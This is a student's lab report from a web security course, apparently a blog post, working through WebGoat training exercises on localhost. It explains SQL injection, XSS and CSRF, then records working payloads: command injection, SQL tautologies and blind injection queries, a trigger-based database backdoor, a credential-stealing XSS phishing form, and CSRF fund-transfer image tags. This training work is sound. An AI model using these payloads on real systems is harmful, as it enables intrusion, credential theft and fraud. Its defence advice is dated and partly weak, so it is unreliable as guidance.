20154322杨钦涵 EXP9 Web安全基础实践

EXP9 Web安全基础实践

一、基础问题回答

1.SQL注入攻击原理,如何防御??

  • 原理:利用未过滤/未审核用户输入的攻击方法,即让应用运行本不应该运行的SQL代码。如果应用毫无防备地创建了SQL字符串并且运行了它们,就会造成一些出人意料的结果。

  • 防御:
    1.对输入的数据进行过滤,过滤掉敏感字符。加密数据库。
    2.在PHP配置文件中Register_globals=off;设置为关闭状态,作用将注册全局变量关闭。
    3.提高数据库命名技巧,对于一些重要的字段根据程序的特点命名,取不易被猜到的
    4.开启PHP安全模式Safe_mode=on;

2.XSS攻击的原理,如何防御?

  • 原理:攻击者利用网站漏洞,输入可以显示在页面上的、对其他用户造成影响的HTML代码;由于受害者浏览器对目标服务器的信任,当其访问目标服务器上被注入恶意脚本的页面后,这段恶意脚本可以顺利执行,实现获取用户cookie并可以利用用户身份进行非法操作的目的。

  • 防御:
    在服务器段限制输入格式,输入类型,输入长度以及输入字符
    要注意避免使用一些有潜在危险的html标签,这些标签很容易嵌入一些恶意网页代码。

3.CSRF攻击原理,如何防御?

  • 什么是CSRF:CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。

  • 原理:通过伪装来自受信任用户的请求来利用受信任的网站。是一种依赖web浏览器的、被混淆过的代理人攻击。

  • 防御:用户在浏览其它站点前登出站点;在浏览器会话结束后清理浏览器的cookie;尽量不要在页面的链接中暴露用户隐私信息;避免全站通用的cookie,严格设置cookie的域。

二、实践过程记录

2.1 webgoat

  • 安装webgoat
    1.打开的时候发现没有安装:

感谢5系同学提供的安装包

2.下载好后,将它放在home里

  • 开启webgoat
    1.输入java -jar webgoat-container-7.1-exec.jar执行webgoat

2.当界面停留在下图所示时,最小化(千万别关了!)。打开浏览器,输入localhost:8080/WebGoat

3.选择默认账号、密码即可登陆成功

2.2 SQL练习

  • 所有项目尝试完

命令注入(Command Injection)

题目要求能够在目标主机上执行系统命令,我发现可以通过火狐浏览器下的一个扩展Firebug对源代码进行修改,例如在BackDoors.help旁边加上& netstat -an & ipconfig

1.打开Command Injection

2.在Command Injection页面上右键,点击inspect Element,在BackDoors.help旁边加上"& netstat -an & ipconfig"

3.选中修改后的值再点view,可以看到命令被执行,出现系统网络连接情况:

数字型SQL注入(Numeric SQL Injection)

1.找到Numeric SQL Injection

这个题大概意思是这个表单允许使用者看到天气数据,利用SQL注入使得可以看见所有数据。

WAY1:BurpSuite(失败)
将BurpSuite打开,然后进行一系列操作后,在将信息发送给repeater的时候,但并没有弹出parmas这一栏,因此就无法修改代码了

WAY2:网页上直接修改(成功)
1.在Numeric SQL Injection页面上右键,点击inspect Element

2.在inspector下添加代码or 1=1构成永真式

3.点击GO,发现成功了

日志欺骗(Log Spoofing)
1.找到Log Spoofing

这道题大概意思是说,我们输入的用户名会被追加到日志文件中。

2.在User Name文本框中输入yqh%0d%0aLogin Succeeded for username: admin,其中%0d是回车,%0a是换行符:

3.攻击成功

XPATH Injection

题目要求是使用帐户Mik/Test123,目标是试着去查看其他员工的数据。

1.和上面一样,尝试构造永真式

user name:yqh' or 1=1 or 'a'='a
password:yqh

2.成功

LAB: SQL Injection
Stage 1:String SQL Injection

使用String SQL注入来绕过身份验证。

1.以用户Neville登录,在密码栏中输入' or 1=1 --永真式进行SQL注入,但是发现登录失败。

2.查看发现password的最大长度为8,将其修改为100

3.再次登录,成功

Stage 3:Numeric SQL Injection

该题目的目的是通过注入语句,浏览到原本无法浏览的信息。绕过认证执行SQL注入,通过一个普通员工的账户larry,浏览其BOSS的账户信息。

1.我们先使用上一题的办法登录进Larry的账户。

  • 刷新了网页需要重新修改最大字符长度

2.老板的薪水应该是最高的,所以把其中的value值改为101 or 1=1 order by salary desc --,这样老板的信息就会被排到第一个

3.点击ViewProfile进去,即可查看老板的详细信息

SQL字符串注入(String SQL Injection)

1.进入webgoat后,选择String SQL Injection

题目大意是:这个表单允许使用者查询他们的信用卡号,使用SQL注入让所有的信用卡号都看得见。

2.注入一个SQL字符串,以显示所有信用卡号码。尝试使用'Snow'的用户名。

3.我们构造一个永真式“1”,那么不管前面的WHERE是否成立都能执行,所以构造语句'or 1='1,成功得到了全部的信用卡号。

Database Backdoors
1.输入注入语句:101; update employee set salary=10000,成功把该用户的工资涨到了10000。随意涨工资感觉不能太棒!

2.接下来使用语句

101;CREATE TRIGGER yqhBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='20154322@qq.com' WHERE userid = NEW.userid

创建一个后门,把表中所有的邮箱和用户ID都设为我的。所有人的工资都邮到我这里~

数字盲注(Blind Numeric SQL Injection)

题目中说明了下面的表单允许用户输入帐号并确定它是否有效,即返回值只有账户有效或无效两种。

1.先输入101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 4000);,结果是
Account number is valid.账户有效,再试试

2.再输入101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 2500 );,结果是
Invalid account number.,账户无效。也就是说,我们要找的数在2000~2500之间

3.利用二分法,多次尝试,找到数字为2364

盲字符串注入(Blind String SQL Injection)

和上一题一样,只是由猜数字变成猜字符方法类似,难度加深

1.输入101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) >'z' );进行猜解,发现结果为Account number is valid,账户有效。

再往大写的字母猜测,最终确定首字母为J

2.接下来猜第二个字母
输入101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) >'h' );发现结果为Account number is valid,账户有效。

最后确定第二个字母为i

3.这样一步步尝试,最后确定用户名为Jill

2.3 Cross-Site Scripting (XSS)

跨站脚本钓鱼攻击(Phishing with XSS)

题目要求是关于一个页面中存在XSS漏洞时,他如何支持钓鱼攻击。要求我们利用xss和html注入达到这些目标。

1.使用XSS和HTML插入制作一个钓鱼网站,将其输在search框中,代码如下:

</form>
  <script>
function hack(){ 
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
} 
  </script>
<form name="phish">
<br><br>
<HR>
  <H2>This feature requires account login:</H2>
<br>
  <br>Enter Username:<br>
  <input type="text" name="user">
  <br>Enter Password:<br>
  <input type="password" name = "pass">
<br>
  <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

2.输入后下拉网页,会有用户名和密码的框出现,随意输入用户名和密码

3.成功

反射型XSS(Reflected XSS Attacks)
1.当我们输入错误的用户信息后,服务器校验输入有误,会返回错误页面并将错误内容展示给我们看:

2.如果我们将带有攻击性的URL作为输入源,比如<script>alert("23320154322yqh");</script>,就会弹出对话框

3.攻击成功

存储型xss(Stored XSS Attacks)
1.题目的意思是我们要在信息中添加一个html的标签。

那就在信息框里写一句<script>alert("BB is watching you!");</script>,然后点击提交之后,留言板上会出现这条信息的标题

2.点进去会弹出如下的框,攻击成功

2.5 CSRF

Cross Site Request Forgery(CSRF)

要求:需要写一个URL诱使其他用户点击,从而触发CSRF攻击.
我们可以以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件。

1.查看自己电脑的Screen和menu的值

2.在信息框内输入<img src="http://localhost:8080/WebGoat/attack?Screen=2078372&menu=900&transferFunds=1000000"/>(这句话的意思是将Funds即金钱转到自己的账户里),点击提交之后可以看到信息

3.点进去后,盗取钱财。攻击成功

CSRF Prompt By-Pass

和上一个类似,发个邮件给newsgrooup,包含两个恶意请求:一个是转钱的金额,另一个是确认转账。

1.首先还是查看电脑的Screen和menu的值

2.在信息框输入

<img src="attack?Screen=1471017872&menu=900&transferFunds=5000" 
width="1" height="1"> 
<img src="attack?Screen=1471017872&menu=900&transferFunds=confirm" 
width="1" height="1">

点击提交后可看到

3.点进去,发现攻击成功

三、实验心得体会

这次实验是步骤最多的一次,也算是尝试了很多内容。开学时老师也说过,网络攻防的实验就是凭自己的兴趣探索的过程,就这样周复一周的探索,在遇到了各种各样的bug的鸡飞狗跳中,居然这就是最后一个实验了,还是有点不舍的。这门课上下来还是很充实的,自学也好,参考学长学姐和同学的也好,还是学习了不少东西!

posted @ 2018-05-22 22:25  杨钦涵20154322  阅读(156)  评论(0编辑  收藏